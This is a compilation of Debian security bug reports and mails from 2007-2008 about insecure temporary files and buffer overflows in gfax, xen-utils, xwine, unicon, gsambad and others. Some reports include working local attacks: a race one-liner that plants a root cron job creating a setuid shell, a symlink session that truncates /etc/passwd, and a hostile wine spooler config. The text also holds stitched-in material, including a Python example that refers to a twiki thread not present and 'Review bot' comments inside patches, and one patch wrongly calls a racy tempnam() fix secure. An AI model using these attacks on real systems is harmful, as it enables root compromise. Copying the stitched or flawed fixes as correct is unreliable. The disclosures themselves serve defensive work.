Severity: grave
Justification: user security hole
Tags: security

*** Please type your report below this line ***

  I'd urge for the removal of this package from Lenny/Sid because
 of bug 460783 + this one...

  xwine contains two flaws:

   1.  Insecure use of temporary files.
   2.  Broken permissions on /etc/wine/config

  Printing uses the static file '/tmp/temporaire' for spooling into
 with no sanity checks, then this:
  ./w_editeur.c:  system("cat /tmp/temporaire | lp &");
  ./w_editeur.c:  system("rm -f /tmp/temporaire");

  The second issue is more interesting.  The global wine configuration
 file is abused thusly:

 ./w_export.c:  system("cp -f ~/.wine/config /etc/wine/");
 ./w_export.c:  system("chmod 666 /etc/wine/config");

  I guess for this to work the program must be started by root,
 but if the permissions are 0666 then any user may edit the file
 and cause DOS for local users.  I'm not horribly familiar with
 Window configuration, but it does seem like you could cause
 arbitrary code to run when a local user invokes wine, and prints,
 via a configuration file like this:

 /etc/wine/config:
 [spooler]
 "FILE:" = "tmp.ps"
 "LPT1:" = "|/tmp/bogus-spooler.lpr"

  Mitigating circumstances are that these days Wine ignores
 /etc/wine/config & ~/.wine/config.  Instead this information
 is stored in the wine registry which actually renders this package
 pointless for etch+

Steve
-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.18-4-xen-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash






Bug#464058: [horde-vendor] Bug#464058: turba access checking issue

2008-02-21 Thread Steve Kemp
On Thu Feb 21, 2008 at 02:41:41 +0100, Gregory Colpart wrote:

> The package turba2 has vulnerabilities (See CVE-2008-0807, bug
> #464058 and changelogs of fixed sarge/etch packages).

  A shining example of how to handle security updates. Thanks very
 very much for the fixed packages, and the clear writeup.

  I'll upload them today, and handle the release when they are
 done.

Steve
-- 






Bug#452518: security.debian.org: Error update samba_3.0.24-6etch5_i386.deb

2007-11-23 Thread Steve Kemp
On Fri Nov 23, 2007 at 12:25:42 +, Domijor wrote:

>Today I updated with aptitude the package "samba" to the version
>"samba_3.0.24-6etch5_i386.deb". I have PDC server with Samba. The cliente
>don't connect
>to server. The cliente connect with "smbfs". The log of system is:

  The package introduced a regression affecting some users.
  An update is pending, in the meantime you can find fixed packages
 here:

  http://people.debian.org/~vorlon/samba/

Steve
-- 







Bug#452515: security.debian.org: Error update samba_3.0.24-6etch5_i386.deb

2007-11-23 Thread Steve Kemp
On Fri Nov 23, 2007 at 12:02:59 +, Error update samba_3.0.24-6etch5_i386.deb wrote:

> Today I updated with aptitude the package "samba" to the version 
> "samba_3.0.24-6etch5_i386.deb". I have PDC server with Samba. The cliente 
> don't connect 
> to server. The cliente connect with "smbfs". The log of system is:

  The package introduced a regression affecting some users.
  An update is pending, in the meantime you can find fixed packages
  here:

http://people.debian.org/~vorlon/samba/

Steve
-- 







Bug#446354: OpenBSD patch for CVE-2007-5365 is insufficient

2007-10-29 Thread Steve Kemp
On Mon Oct 29, 2007 at 19:33:17 +0100, Tomas Hoger wrote:

> During testing of our updated dhcp packages, we have found out that
> patch for CVE-2007-5365 used by OpenBSD was not sufficient and it was
> still possible to crash dhcpd.  Your dhcp packages released in DSA
> 1388-1 also seem affected. You can find better patch based on dhcp-3.x
> code here:
> 
>   https://bugzilla.redhat.com/show_bug.cgi?id=327781#c5
> 
> Note: [EMAIL PROTECTED] was notified on 2007-10-23.
> Updated DSA 1388-3 released on 2007-10-29.

  Thanks, we have a built package already.  I'm not sure who is
  releasing it - I guess I should since I did the previous one.
  I'll chase it tomorrow/wednesday.

Steve
-- 






Bug#447795: xen-utils-3.0.3-1: [CVE-2007-3919] xenmon.py / xenbaked insecure file access

2007-10-23 Thread Steve Kemp
Package: xen-utils-3.0.3-1
Version: 3.0.3-0-3
Severity: grave
Tags: security
Justification: user security hole


  Xen versions 3.x, and 3.1 contain a tool for processing Xen trace
 buffer information.

  This tool uses the static file /tmp/xenq-shm insecurely allowing
 a local user to truncate any local file when xenbaked or xenmon.py
 are invoked by root.

  Sample session:

# setup.
[EMAIL PROTECTED]:~$ ln -s /etc/passwd /tmp/xenq-shm

# later.
[EMAIL PROTECTED]:~$ sudo xenbaked

# all gone.  :(
[EMAIL PROTECTED]:~$ ls -l /etc/passwd
-rw-r--r-- 1 0 root 327680 2007-10-17 00:14 /etc/passwd

  This flaw is known as CVE-2007-3919 by the common vulnerabilities
 and exposures project.

  As the filename needs to be shared between xenmon.py + xenbaked.c
 a "random" one cannot easily be generated.  The solution that 
 Debian will use for its security update is to create the file in
 a location which is only writable by root - /var/run.

  Security advisory will be released very soon.

Steve
-- 
-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-5-xen-amd64
Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1)

Versions of packages xen-utils-3.0.3-1 depends on:
ii  iproute            20061002-3         Professional tools to control the 
ii  libc6              2.3.6.ds1-13etch2  GNU C Library: Shared libraries
ii  libncurses5        5.5-5              Shared libraries for terminal hand
ii  python             2.4.4-2            An interactive high-level object-o
ii  python-central     0.5.12             register and build utility for Pyt
ii  udev               0.105-4            /dev/ and hotplug management daemo
ii  xen-utils-common   3.0.3-0-2          XEN administrative tools - common 
ii  zlib1g             1:1.2.3-13         compression library - runtime

Versions of packages xen-utils-3.0.3-1 recommends:
ii  bridge-utils  1.2-1  Utilities for configuring the Linu
ii  xen-hypervisor-3.0.3-1-amd64  3.0.3-0-3  The Xen Hypervisor on AMD64

-- no debconf information
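The twiki postinst earlier on this page trusts whatever sits at /tmp/twiki, and xenmon.py and xenbaked trust whatever sits at /tmp/xenq-shm; a random filename is no answer when two programs must agree on the name, which is why the report above settles on a directory only root can write. The following is an added example, not code from either package: a Python 3 create-or-open for a shared fixed-name file that first vets the directory (a real directory, owned by us, writable by nobody else, which is what /var/run gives a root process), then opens with O_NOFOLLOW and re-checks the opened inode with fstat. The demo replays the twiki symlink and the xen truncation against a scratch tree it constructs (an assumption of the example).

```python
import os
import shutil
import stat
import tempfile


def directory_is_trusted(dirpath):
    """A fixed, shared filename is only as safe as its directory.  Require
    a real directory (lstat, so a symlink planted at the path fails here),
    owned by the user we run as, and writable by no one else.  That is the
    property /var/run has for root and /tmp never has."""
    try:
        st = os.lstat(dirpath)
    except FileNotFoundError:
        return False
    if not stat.S_ISDIR(st.st_mode):
        return False
    if st.st_uid != os.geteuid():
        return False
    return not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def open_shared_file(dirpath, name, size):
    """Create-or-open the shared buffer the way two cooperating programs
    (xenmon.py and xenbaked in the report) need: no O_EXCL, because the
    second program legitimately finds the file present, but O_NOFOLLOW so
    a symlink is never traversed, and an fstat on the opened descriptor to
    reject anything that is not a plain file of ours with a single link.
    Returns a file descriptor, or None if any check fails."""
    if not directory_is_trusted(dirpath):
        return None
    path = os.path.join(dirpath, name)
    flags = os.O_RDWR | os.O_CREAT | os.O_NOFOLLOW | os.O_CLOEXEC
    try:
        fd = os.open(path, flags, 0o600)
    except OSError:               # ELOOP for a symlink, EACCES, ...
        return None
    st = os.fstat(fd)
    if not stat.S_ISREG(st.st_mode) or st.st_uid != os.geteuid() or st.st_nlink != 1:
        os.close(fd)
        return None
    os.ftruncate(fd, size)        # the operation that emptied /etc/passwd, now harmless
    return fd


def demo():
    """Exercise the checks in a scratch tree constructed here."""
    base = tempfile.mkdtemp()
    try:
        results = {}
        # 1. A private directory we own: the file is created, and a second
        #    open finds the same inode, which is the sharing we wanted.
        good = os.path.join(base, "run")
        os.mkdir(good, 0o700)
        fd1 = open_shared_file(good, "xenq-shm", 4096)
        fd2 = open_shared_file(good, "xenq-shm", 4096)
        results["private_dir_ok"] = (fd1 is not None and fd2 is not None
                                     and os.fstat(fd1).st_ino == os.fstat(fd2).st_ino)
        for fd in (fd1, fd2):
            if fd is not None:
                os.close(fd)
        # 2. A /tmp-like directory (sticky, world-writable) is refused outright.
        shared = os.path.join(base, "tmp")
        os.mkdir(shared)
        os.chmod(shared, 0o1777)
        results["world_writable_dir_refused"] = open_shared_file(shared, "xenq-shm", 4096) is None
        # 3. Even inside a trusted directory a planted symlink is not followed,
        #    so the victim is neither created nor truncated.
        victim = os.path.join(base, "passwd")
        with open(victim, "w") as fh:
            fh.write("root:x:0:0:root:/root:/bin/sh\n")
        os.symlink(victim, os.path.join(good, "planted"))
        results["symlink_refused"] = open_shared_file(good, "planted", 0) is None
        results["victim_intact"] = os.path.getsize(victim) > 0
        # 4. The twiki case: the directory path itself is a symlink to a file.
        os.symlink(victim, os.path.join(base, "twiki"))
        results["symlinked_dir_refused"] = directory_is_trusted(os.path.join(base, "twiki")) is False
        return results
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    print(demo())
```

The directory check is what the postinst in the twiki thread lacked: `[ ! -e /tmp/twiki ]` is true for a symlink too, and chmod/chown then follow it. The fstat after open matters as well: the ownership and link-count tests catch a hard link to someone else's file that O_NOFOLLOW alone would accept.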






Bug#446354: dhcp: stack-based buffer overflow (CVE-2007-5365)

2007-10-15 Thread Steve Kemp
On Fri Oct 12, 2007 at 22:51:24 +1000, Steffen Joeris wrote:

> A patch is attached below. Please tell me, if you want to take care of
> it or if i should upload.

  Thanks for the patch, I will upload with it.

Steve
-- 






Bug#441555: lighttpd: header overflow when using the mod_fastcgi extension

2007-09-11 Thread Steve Kemp
On Mon Sep 10, 2007 at 13:41:10 +0200, Stefan Andersson wrote:
> Package: lighttpd
> Version: 1.4.13-4etch1
> Severity: critical
> Tags: security
> Justification: arbitrary code execution

  Fixed already in DSA-1362.


Steve
-- 






Bug#436701: CVE-2007-1614: DoS and execution of arbitrary code

2007-08-08 Thread Steve Kemp
On Thu Aug 09, 2007 at 01:07:47 +1000, Steffen Joeris wrote:
> Package: zziplib
> Severity: grave
> Tags: security
> Justification: user security hole
> 
> Hi
> 
> The following CVE[0] has be issued against zziplib.

  This seems to be a low-risk, from the one page I found describing
 it:

 
http://www.securitylab.ru/forum/read.php?FID=21&TID=40858&MID=326187#message326187

  Basically "zzcat $longfilename" crashes.  I wouldn't have thought
 this would require a DSA.

Steve
--





Bug#435735: CVE-2007-3791: Buffer overflow in policyd

2007-08-04 Thread Steve Kemp
On Thu Aug 02, 2007 at 23:34:10 +0200, Stefan Fritsch wrote:
> Package: postfix-policyd
> Version: 1.80-2.1
> Severity: grave
> Tags: security
> Justification: user security hole
> 
> A vulnerability has been found in policyd. From CVE-2007-3791:

  Building now.

Steve
-- 





Bug#396360: Maybe time for DSA?

2007-07-29 Thread Steve Kemp
On Sat Jul 28, 2007 at 11:18:54 +0300, Touko Korpela wrote:
> This bug has patch included, maybe security team could do upload?

  The code in Etch already contains this patch...  I've not
 had a chance to check sarge yet, but I'm thinking that we're 
 OK.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit






Bug#434888: Multiple vulnerabilities [CVE-2007-3946] [CVE-2007-3947] [CVE-2007-3948] [CVE-2007-3949] [CVE-2007-3950]

2007-07-27 Thread Steve Kemp
On Fri Jul 27, 2007 at 09:11:48 -0500, Adam Majer wrote:
> Package: lighttpd
> Severity: critical
> Tags: security
> 
> Upstream patches from Trac seem to be available from upstream.

  Still waiting on CVE IDs.  I can upload without them, but I'd
 rather not ..

Steve
-- 





Bug#434546: lighttpd: 1.4.16 has been released and contains security fixes

2007-07-24 Thread Steve Kemp
On Tue Jul 24, 2007 at 21:14:31 +0200, Olaf van der Spek wrote:

> Lighttpd 1.4.16 has been released and contains security fixes, see 
> http://www.lighttpd.net/2007/7/24/1-4-16-let-s-ship-it

  A release is in preparation, just waiting on CVE IDs.  We have
 one ..

Steve
-- 





Bug#428368: lighttpd vuln patch

2007-07-24 Thread Steve Kemp
  This one isn't going to get released as-is, as there are a couple
 more pending issues with lighttpd.
  I'll roll them all up once I have valid identifiers for them.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit






Bug#428368: lighttpd vuln patch

2007-07-20 Thread Steve Kemp
On Fri Jul 20, 2007 at 11:02:07 +0200, Pierre Habouzit wrote:
>   attached is the patch that fixes it. I'm going to NMU lighttpd in
> unstable, please someone takes care of etch.

  Joey if you could allocate a DOS CVE ID I'll do the upload,
 I've already done lighttpd patches for etch.

Steve
-- 





Bug#432924: [CVE-2007-3641, CVE-2007-3644, CVE-2007-3645] various security bugs

2007-07-13 Thread Steve Kemp
On Fri Jul 13, 2007 at 08:16:07 -0500, John Goerzen wrote:
> I will upload a fix to unstable shortly.  However, it sounds like this could 
> also impact the version in stable, so CCing [EMAIL PROTECTED]

  Yes that looks to be the case.

  If you had a patch that would apply to the version in Stable that
 would be appreciated.  I applied the FreeBSD patch but that failed
 more than it succeeded ..

  I'll have a few hours tomorrow to look at it, so don't worry too
 much if you can't supply it.

Steve
-- 





Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype

2007-07-10 Thread Steve Kemp
On Mon Jul 09, 2007 at 17:43:47 -0700, Steve Langasek wrote:

> > Ok, uploading.
> 
>  -- please kick this one out, I just noticed I built it with
> stable-security as the target.

  I'd be happy to do that if you, or somebody else, could tell me
 how to do so..

> Let me know if you would like me to re-roll -7 or prepare a -8 instead.

  I think we need a -8 if the -7 has been seen, right?

Steve
-- 





Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype

2007-07-09 Thread Steve Kemp
On Mon Jul 09, 2007 at 12:43:57 -0700, Steve Langasek wrote:

> I've uploaded a freetype 2.1.7-7 package to
> , signed and built for sarge. 

  Thanks.

> Let me know if you would like me to upload this to security.d.o (I promise
> I'll even use the embargoed queue this time, so you don't have to go hunting
> for the upload ;).

  That'd be grand, thanks.

> Unfortunately, going back through my mail I see that there's another open
> security report against freetype, bug #426771.  I have not investigated this
> at all to confirm which versions of freetype are affected.  Please advise if
> you would like me to look into this for possible inclusion in 2.1.7-7.

  :(

  I think that for the moment it would be best to push this out so that
 we're all on a level playing field.  (Which reminds me some of the
 slower buildds have started catching up too..)

Steve
-- 





Bug#431893: Acknowledgement (CVE-2007-2839: Trivial local-root attack)

2007-07-05 Thread Steve Kemp

  This is fixed in DSA-1329-1.  Just reported here for reference.

Steve
-- 





Bug#431893: CVE-2007-2839: Trivial local-root attack

2007-07-05 Thread Steve Kemp

Package: gfax
Version: 0.4.2-11
Severity: grave
Usertags: sourcescan
Tags: security

*** Please type your report below this line ***


  The gfax package as released in Sarge makes unsafe use of temporary files,
 which allows local users to gain root trivially.

  Etch, Lenny, and Sid are unaffected.


  The following code is in src/mgetty_setup.c:

/* Excerpt from src/mgetty_setup.c (gfax 0.4.2-11). The include, the local
 * declarations, the hypothetical wrapper name and the closing brace of the
 * first copy loop (missing in the report) are supplied so the fragment reads
 * as a unit; the /tmp/crontab handling is as shipped. do_message() and _()
 * are gfax's own helpers. */
#include <stdio.h>

static void remove_faxrunq_entry(void)
{
    FILE *fin, *fout;
    char buf[128];
    int c;

    /* if it's NULL then nuke the faxrunq crontab entry.  */
    if ((fin = fopen("/etc/crontab", "r")) == NULL) {
        do_message(_("\nCan't open /etc/crontab\n"));
        return;
    }
    /* Fixed name in the world-writable /tmp, opened with "w": whatever a
     * local user left there (file or symlink) is followed and truncated,
     * and its ownership is untouched. */
    if ((fout = fopen("/tmp/crontab", "w")) == NULL) {
        do_message(_("\nCan't create /tmp/crontab\n"));
        return;
    }

    while (fgets(buf, 128, fin) != NULL) {
        fputs(buf, fout);
    }
    fclose(fout);
    fclose(fin);

    /* now copy the new file back to /etc */
    /* Between the fclose() above and this fopen(), /tmp/crontab is still
     * writable by its original owner, so its contents can be replaced. */
    if ((fin = fopen("/tmp/crontab", "r")) == NULL) {
        do_message(_("\nCan't open /tmp/crontab\n"));
        return;
    }
    if ((fout = fopen("/etc/crontab", "w")) == NULL) {
        do_message(_("\nCan't create /etc/crontab\n"));
        return;
    }

    while ((c = fgetc(fin)) != EOF)
        fputc(c, fout);

    fclose(fout);
    fclose(fin);
    remove("/tmp/crontab");
}


  This can be abused to write arbitrary commands to the /etc/crontab file.

  If /tmp/crontab exists already, owned by a non-root user then it will
 be truncated and trashed.  However the ownership will still remain that
 of the non-root user - so a race condition between the first copy
 and the second copy can allow arbitrary line(s) to be appended to /etc/crontab.

  The following exploits this easily:

[EMAIL PROTECTED]:~$ while true; do echo "*/1 * * * * root /bin/cp /bin/sh /tmp 
&& chmod 4755 /tmp/sh" > /tmp/crontab; done

  When root runs the setup program things end up like this:

[EMAIL PROTECTED]:~$ ls -l /etc/crontab 
-rw-r--r-- 1 root root 60 2007-07-02 20:27 /etc/crontab

[EMAIL PROTECTED]:~$ cat /etc/crontab
*/1 * * * * root /bin/cp /bin/sh /tmp && chmod 4755 /tmp/sh

[EMAIL PROTECTED]:~$ ls -l /tmp/sh
-rwsr-xr-x 1 root root 769368 2007-07-02 20:28 /tmp/sh


Steve
-- 
http://www.steve.org.uk/





Bug#431332: CVE-2007-2837: Arbitrary file removal

2007-07-01 Thread Steve Kemp
On Sun Jul 01, 2007 at 21:56:43 +0200, Martin MAURER wrote:

> I agree that this code could become a problem, although I wasn't able to
> reproduce using screen and the command written in your mail.

  I could reproduce this using the -qt version of the client.  First of
 all adding some rules, then bringing up the rule list and removing one
 of them.

> Anyways - what really might happen is that the file is overwritten, not
> deleted, as rm should delete the link not the file the link points to.

  That is generally true.  I'm trying to remember whether it was
 unlinked and I'm 99% certain it was, rather than truncated/trashed.

> Nevertheless, this doesnt make a big difference, so I will add your fix
> to the official version of fireflier. 

  Thanks a lot.

Steve
-- 
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/






Bug#431336: Patch

2007-07-01 Thread Steve Kemp

  Patch we used for the DSA.

diff -u unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c 
unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c
--- unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c
+++ unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c
@@ -159,9 +159,9 @@
 IMM_Flush ()
 {
   char name[256];
-  sprintf(name,"%s/.pyinput/usrphrase.tab",getenv("HOME"));
+  snprintf(name,sizeof(name)-1,"%s/.pyinput/usrphrase.tab",getenv("HOME"));
   SaveUsrPhrase(name);
-  sprintf(name,"%s/.pyinput/sysfrequency.tab",getenv("HOME"));
+  snprintf(name,sizeof(name)-1,"%s/.pyinput/sysfrequency.tab",getenv("HOME"));
   SavePhraseFrequency(name);
 
   return 1;
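Review bot: both new snprintf() calls in IMM_Flush() still hand getenv("HOME") to "%s" unchecked, so an unset HOME passes NULL (undefined behaviour; glibc happens to print "(null)"), and a HOME that does not fit is silently truncated and then used by SaveUsrPhrase()/SavePhraseFrequency() as a path. Suggest checking HOME for NULL first and treating a return value >= sizeof(name) as an error that skips the flush. The `sizeof(name)-1` is also unnecessary: snprintf() already reserves room for the terminating NUL, so the -1 only shortens the usable buffer.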
diff -u unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c 
unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c
--- unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c
+++ unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c
@@ -138,21 +138,21 @@
   //Rat: modified for processing user-defined dictionaries
   if ((usrhome = getenv ("HOME")) != NULL)
{
-  sprintf (buf, "%s/%s", usrhome, ".pyinput");
+  snprintf (buf,sizeof(buf)-1, "%s/%s", usrhome, ".pyinput");
   retval = stat (buf, &statbuf);
 
   if ((retval == 0))
{
  if ((statbuf.st_mode & S_IFMT) == S_IFDIR)
{
- sprintf (buf, "%s/%s/%s", usrhome, ".pyinput", "usrphrase.tab");
+ snprintf (buf, sizeof(buf)-1, "%s/%s/%s", usrhome, ".pyinput", 
"usrphrase.tab");
 
  if ( (retval = stat(buf, &statbuf)) == 0)
{
  if ( statbuf.st_size < MIN_USRPHR_SIZE || LoadUsrPhrase (buf) 
== -1)
{
  printf ("Couldn't load %s. Please fix it. size or load 
error\n", buf);
- sprintf (buf, "%s/%s", szPath, 
"usrphrase.tab");
+ snprintf (buf, sizeof(buf)-1, "%s/%s", 
szPath, "usrphrase.tab");
  if ((retval = access (buf, R_OK)) == 0)
{
  if (LoadUsrPhrase (buf) == -1)
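Review bot: `buf` is not declared inside this hunk, so `sizeof(buf)-1` is only right if it is a fixed-size array in the enclosing function; if it is a pointer parameter, sizeof() yields the pointer width and every call here truncates to 7 characters. Worth confirming the declaration at the top of the function. As in the previous file, the -1 is redundant with snprintf()'s own NUL accounting.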
@@ -164,7 +164,7 @@
  else
{
  creat (buf, 0600);
- sprintf (buf, "%s/%s", szPath, "usrphrase.tab");
+ snprintf (buf, sizeof(buf)-1, "%s/%s", szPath, 
"usrphrase.tab");
  if ((retval = access (buf, R_OK)) == 0)
{
  if (LoadUsrPhrase (buf) == -1)
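Review bot: `creat (buf, 0600);` discards the descriptor it returns, leaking one fd each time this branch runs, and `buf` is then overwritten with the szPath fallback on the next line, so the freshly created file is never referenced again. Pre-existing, but since the line after it is being touched anyway, close() the descriptor (or check creat()'s return value) in the same change.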
@@ -181,10 +181,10 @@
   else
{
  mkdir (buf, 0700);//Rat: making $HOME/.pyinput
- sprintf (buf, "%s/%s/%s", usrhome, ".pyinput", "usrphrase.tab");
+ snprintf (buf, sizeof(buf)-1, "%s/%s/%s", usrhome, ".pyinput", 
"usrphrase.tab");
  creat (buf, 0600);//Rat: making $HOME/.pyinput/usrphrase.tab
 
- sprintf (buf, "%s/%s", szPath, "usrphrase.tab");
+ snprintf (buf, sizeof(buf)-1, "%s/%s", szPath, "usrphrase.tab");
  if ((retval = access (buf, R_OK)) == 0)
{
  if (LoadUsrPhrase (buf) == -1)
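Review bot: silent truncation matters here more than in the read-only paths: with a HOME longer than sizeof(buf), `mkdir (buf, 0700)` and `creat (buf, 0600)` now operate on a cut-off path and create a directory and file at a location the user did not ask for, and both return values are ignored. Fail the whole setup when the snprintf() result is >= sizeof(buf) rather than proceeding with a partial path.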
@@ -197,7 +197,7 @@
   else
 {
   printf ("Sorry, I couldn't find your $HOME.\n");
-  sprintf (buf, "%s/%s", szPath, "usrphrase.tab");
+  snprintf (buf, sizeof(buf)-1, "%s/%s", szPath, "usrphrase.tab");
   printf ("Turn to access %s", buf);
 
   if ((retval = access (buf, R_OK)) != 0)
@@ -210,7 +210,7 @@
 
 }
 
-  sprintf(buf,"%s/%s/%s",usrhome,".pyinput","sysfrequency.tab");
+  snprintf(buf,sizeof(buf)-1,"%s/%s/%s",usrhome,".pyinput","sysfrequency.tab");
   if(LoadPhraseFrequency(buf) == -1)
   {
  creat(buf,0700);
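Review bot: this snprintf() runs after the `if ((usrhome = getenv ("HOME")) != NULL)` block has closed (the `else` branch printing "Sorry, I couldn't find your $HOME." is visible just above), so with HOME unset `usrhome` is NULL here and is passed to "%s". Guard it the same way the szPath fallback does. Separately, `creat(buf,0700)` sets the execute bit on a data file; 0600, as used for usrphrase.tab, is enough.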
@@ -229,7 +229,7 @@
   AdjustPhraseFreq (); // lower the freq to [0,50)
   if (usrhome != NULL)
 {
-  sprintf (szFileName, "%s/%s/%s", usrhome, ".pyinput", "usrphrase.tab");
+  snprintf (szFileName, sizeof(szFileName)-1, "%s/%s/%s", usrhome, 
".pyinput", "usrphrase.tab");
   SaveUsrPhrase (szFileName);
 }
   else
diff -u unicon-3.0.4/debian/changelog unicon-3.0.4/debian/changelog
--- unicon-3.0.4/debian/changelog
+++ unicon-3.0.4/debian/changelog
@@ -1,3 +1,11 @@
+unicon (3.0.4-11etch1) stable-security; urgency=high
+
+  * Non-maintainer upload by The Security Team.
+  * Fix the unsafe use of environmental variables.
+[CVE-2007-2835]
+
+ -- Steve Kemp <[EMAIL PROTECTED]>  Sun,  24 Jul 2007 15:02:42 +
+
 unicon (3.0.4-11) unstable; urgency=low
 
   * Changed TLS_PthSocket ::read ::write to Read, Write.
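Review bot: the trailer reads `Sun,  24 Jul 2007`, but 24 Jul 2007 was a Tuesday and this mail is dated 1 Jul 2007; 24 Jun 2007 was a Sunday, so the month looks like the typo (lintian warns on a weekday that does not match the date). The entry also describes the fix as "unsafe use of environmental variables", whereas the hunks bound sprintf() writes into fixed 256-byte buffers; naming the buffer overflow would make the CVE-2007-2835 entry clearer.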


Steve
-- 
http://www.steve.org.uk/





Bug#431331: CVE-2007-2838: Allow arbitrary files to be created/truncated

2007-07-01 Thread Steve Kemp
On Sun Jul 01, 2007 at 21:47:42 +0200, Daniel Baumann wrote:

> uploaded 0.1.6-2 with your patch and urgency=high, so you probably want
> to mention this version for testing/sid in the DSA.

  Great.

> no offence intended, but i'd be happy if you can next time attach the
> patch to the bug report right from the beginning.

  None taken.  That was a genuine mistake, I honestly thought I'd 
 copied you into my initial report with the problem.  I usually do
 that so that maintainers aren't caught on the hop.

  I'll be much more careful to make sure I do that next time.

Steve
-- 





Bug#431331: CVE-2007-2838: Allow arbitrary files to be created/truncated

2007-07-01 Thread Steve Kemp
On Sun Jul 01, 2007 at 20:54:24 +0200, Daniel Baumann wrote:

> I assume that the 0.1.4-2etch1 upload a few minutes ago was a security
> upload of yours, hence I'll wait until this appears and upload then a
> fixed package to sid.

  yes that is correct.

  If you're happy to upload soon that would be great.  I'll attach the
 patch I used.

Steve
-- 
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/

diff -u gsambad-0.1.4/config.sub gsambad-0.1.4/config.sub
--- gsambad-0.1.4/config.sub
+++ gsambad-0.1.4/config.sub
@@ -4,7 +4,7 @@
 #   2000, 2001, 2002, 2003, 2004, 2005, 2006 Free Software Foundation,
 #   Inc.
 
-timestamp='2006-09-20'
+timestamp='2006-07-02'
 
 # This file is (in principle) common to ALL GNU software.
 # The presence of a machine in this file suggests that SOME GNU software
@@ -276,7 +276,6 @@
 	| pdp10 | pdp11 | pj | pjl \
 	| powerpc | powerpc64 | powerpc64le | powerpcle | ppcbe \
 	| pyramid \
-	| score \
 	| sh | sh[1234] | sh[24]a | sh[23]e | sh[34]eb | sheb | shbe | shle | sh[1234]le | sh3ele \
 	| sh64 | sh64le \
 	| sparc | sparc64 | sparc64b | sparc64v | sparc86x | sparclet | sparclite \
@@ -285,7 +284,7 @@
 	| tahoe | thumb | tic4x | tic80 | tron \
 	| v850 | v850e \
 	| we32k \
-	| x86 | xc16x | xscale | xscalee[bl] | xstormy16 | xtensa \
+	| x86 | xscale | xscalee[bl] | xstormy16 | xtensa \
 	| z8k)
 		basic_machine=$basic_machine-unknown
 		;;
@@ -368,7 +367,7 @@
 	| tron-* \
 	| v850-* | v850e-* | vax-* \
 	| we32k-* \
-	| x86-* | x86_64-* | xc16x-* | xps100-* | xscale-* | xscalee[bl]-* \
+	| x86-* | x86_64-* | xps100-* | xscale-* | xscalee[bl]-* \
 	| xstormy16-* | xtensa-* \
 	| ymp-* \
 	| z8k-*)
@@ -910,10 +909,6 @@
 	sb1el)
 		basic_machine=mipsisa64sb1el-unknown
 		;;
-	sde)
-		basic_machine=mipsisa32-sde
-		os=-elf
-		;;
 	sei)
 		basic_machine=mips-sei
 		os=-seiux
@@ -1371,9 +1366,6 @@
 # system, and we'll never get to this point.
 
 case $basic_machine in
-score-*)
-		os=-elf
-		;;
 spu-*)
 		os=-elf
 		;;
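Review bot: the five config.sub hunks above (timestamp 2006-09-20 rolled back to 2006-07-02, and the score, xc16x and sde entries removed) revert the autotools file to an older copy and have nothing to do with the CVE-2007-2838 fix; they look like the result of building from a tree whose config.sub had been regenerated. A stable-security NMU should carry only the temporary-file change, so these hunks should be dropped from the diff.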
diff -u gsambad-0.1.4/debian/changelog gsambad-0.1.4/debian/changelog
--- gsambad-0.1.4/debian/changelog
+++ gsambad-0.1.4/debian/changelog
@@ -1,4 +1,12 @@
-gsambad (0.1.4-2) unstable; urgency=medium
+gsambad (0.1.4-2etch1) stable-security; urgency=high
+
+  * Non-maintainer upload by The Security Team.
+  * Avoid unsafe usage of temporary files.
+[CVE-2007-2838]
+
+ -- Steve Kemp <[EMAIL PROTECTED]>  Thu, 28 Jun 2007 16:47:39 +
+
+gsambad (0.1.4-2) unstable; urgency=medium	
 
   * Adjusting the icondir.
   * Makeing use of su-to-root in the desktop file.
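Review bot: the `-gsambad (0.1.4-2) unstable; urgency=medium` / `+gsambad (0.1.4-2) unstable; urgency=medium	` pair only appends a trailing tab to the previous entry's header line, which is whitespace noise; revert it so the interdiff shows nothing but the new 0.1.4-2etch1 stanza.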
only in patch2:
unchanged:
--- gsambad-0.1.4.orig/src/populate_conns.c
+++ gsambad-0.1.4/src/populate_conns.c
@@ -48,7 +48,8 @@
 long file_size=0, old_pos=0;
 gchar *combined=NULL;
 gchar *utf8=NULL;
-
+char command_buffer[1024];
+char * filename;
 gtk_list_store_clear(widgets->conns_store);
 
 /* This attempt to show useful output is probably quite
@@ -64,20 +65,37 @@
 fflush(stdin);
 fflush(stdout);
 
-/* Write the output of smbstatus to a tempfile, FIXME: Static paths and generally notgoodtoday */
-if((fp=popen("touch /tmp/gsambadtmp && chmod 600 /tmp/gsambadtmp && smbstatus 2>&1> /tmp/gsambadtmp", "w"))==NULL)
+/* make a secure temporary file */
+filename = tempnam( "/tmp", "p_c.c" );
+
+/* Write the output of smbstatus to a tempfile. */
+snprintf( command_buffer, sizeof(command_buffer) - 1,
+	  "touch %s && chmod 600 %s && smbstatus 2>&1> %s",
+	  filename, filename, filename );
+
+if((fp=popen(command_buffer, "w"))==NULL)
 {
+/*  free memory */
+free( filename );
+
 	/* Dont show a popup */
 return;
 }
 pclose(fp);
 
 /* We want it in a tempfile so we can scroll around in it properly */
